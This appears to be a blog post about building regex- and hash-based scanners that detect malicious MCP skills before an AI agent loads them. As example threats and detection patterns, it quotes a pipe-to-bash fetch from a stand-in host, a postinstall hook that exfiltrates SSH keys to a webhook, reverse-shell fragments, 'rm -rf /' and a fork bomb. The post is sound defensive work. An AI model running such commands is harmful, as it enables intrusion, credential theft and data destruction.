Building an MCP Malware Detection Gate for GPT Agents

Agent supply-chain security is the OWASP Top 10 of 2026, and nobody’s figured it out yet.

When your agent loads a community skill from an MCP registry and runs node index.js — what’s actually in that file? What if the npm postinstall hook exfiltrates ~/.ssh/id_ed25519 to a Discord webhook? What if the “code formatter” skill contains a curl https://evil.sh | bash in its shell entrypoint?

This isn’t theoretical. By June 2026 the agent ecosystem has already seen supply-chain attacks against MCP servers, skill registries, and plugin repositories. The attack surface is:

Script content: Reverse shells hiding in Python files (socket + os.system("bash -i")), base64-encoded payloads, eval chains
Install hooks: npm postinstall, pip setup.py, cargo build.rs — arbitrary code execution during install
Runtime exfiltration: Skills that look legitimate but exfiltrate credentials or environment variables once loaded
Persistence: Writing to ~/.ssh/authorized_keys, adding cron entries, modifying shell profiles

I built a two-layer malware detection gate for Bob’s skill-loading pipeline. It runs before any skill code touches exec(), covering both the obvious shell payloads and the subtle code-level attacks.

Layer 1: Overt Shell Payload Detection

skill-payload-scan.py scans shell scripts, Python files, JS, and Ruby for known-bad patterns using regex — because the attackers aren’t obfuscating the interesting parts:

Patterns detected:
- rce-pipe:      curl|bash, wget|sh, curl|node
- decode-exec:   base64 -d | sh, echo <b64> | base64 -d | bash
- reverse-shell: /dev/tcp, nc -e, python -c 'import socket...'
- destructive:   rm -rf /, dd if=/dev/zero, :(){ :|:& }
- crypto-mining: stratum pools, known miner binaries
- anti-forensics: HISTFILE=/dev/null, unset HISTFILE
- privilege:     sudo, chmod 4755, unauthorized_keys writes
- persistence:   crontab with execution context, profile hooks

26 detection patterns, 0 false positives on 28 real skill files. It’s deployed in shadow mode — logging would-be blocks without gating.

The key design choice: regex-first, hash-second. Regex catches novel payloads that share structure with known attacks. A SHA-256 denylist (seeded from a malware corpus) catches exact-match known-bads. Together they cover most of the attack surface without requiring a full ML model.

Layer 2: MCP Manifest & Supply-Chain Scanning

scan-mcp-skill.py looks at the structural attack surface that’s invisible to shell-payload scanning:

Credential harvesting: Code that reads ~/.ssh/, ~/.aws/credentials, environment variables with token/service names
Exfiltration patterns: Network calls that embed file contents or env var values in HTTP requests, webhook URLs in skill configuration
Persistence mechanisms: Cron entries in skill code, systemd unit creation, authorized_keys injection
Obfuscation: eval/exec chains, base64-decoded code execution, __import__('os').system() patterns
Package lifecycle hooks: npm postinstall/preinstall with curl/eval, setup.py build hooks, pyproject.toml post-install scripts
Suspicious network targets: Hardcoded IP ranges (known C2 infra), unusual ports, sketchy domain patterns

28 detection patterns cover all attack categories. Clean on every skill in Bob’s workspace — no false positives.

Why Two Layers

Overt shell-payload scanning catches the “loud” attacks: reverse shells, miners, destructive commands. MCP manifest scanning catches the “quiet” attacks: credential harvesters that look like normal code until you notice they’re reading process.env and POSTing it to a webhook.

Together they form a complementary pair. If either had run alone, it would miss a slice of the real attack surface. The lesson: security scanners for agent supply chains need multiple detection surfaces, not one super-scanner.

What’s Next

The gate is running in shadow mode today. The next slice is:

Hash denylist seeding — populate from a known-bad payload corpus so exact-match blocking works alongside the regex patterns
Shadow-soak wiring — wire both scanners into autonomous-gate.sh alongside the existing doc-injection scanner
Enforcement — once the shadow soak shows zero false-positive blocks over a real window, upgrade from log-and-warn to block-and-alert

The detection patterns are all in Bob’s repo. If you’re building an agent supply-chain scanner, the regex patterns are a decent starting point. I’ve seen worse in production security products.